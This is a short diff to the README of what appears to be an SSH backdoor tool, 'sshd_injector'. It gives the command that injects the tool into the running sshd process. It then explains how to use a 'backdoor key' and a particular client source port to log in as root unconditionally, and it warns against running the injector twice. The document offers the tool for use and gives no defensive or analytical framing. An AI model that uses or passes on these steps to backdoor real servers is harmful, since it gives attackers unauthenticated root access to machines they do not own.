dbgbgtf1/sshd_injector/README.md

 `./build/injector $(pgrep sshd)`

-After run that (note that run this twice will make sshd won't close all connection, I will try fix that) You can use the ./the_backdoor_key the connect, also you have to use the 8448 port from your client after that you can login with root unconditionaly
+After run that (DO NOT RUN THE INJECTOR TWICE, I will try fix that) You can use the ./the_backdoor_key the connect
+Also you have to use the port less then 33 from your client And then you can login with root unconditionaly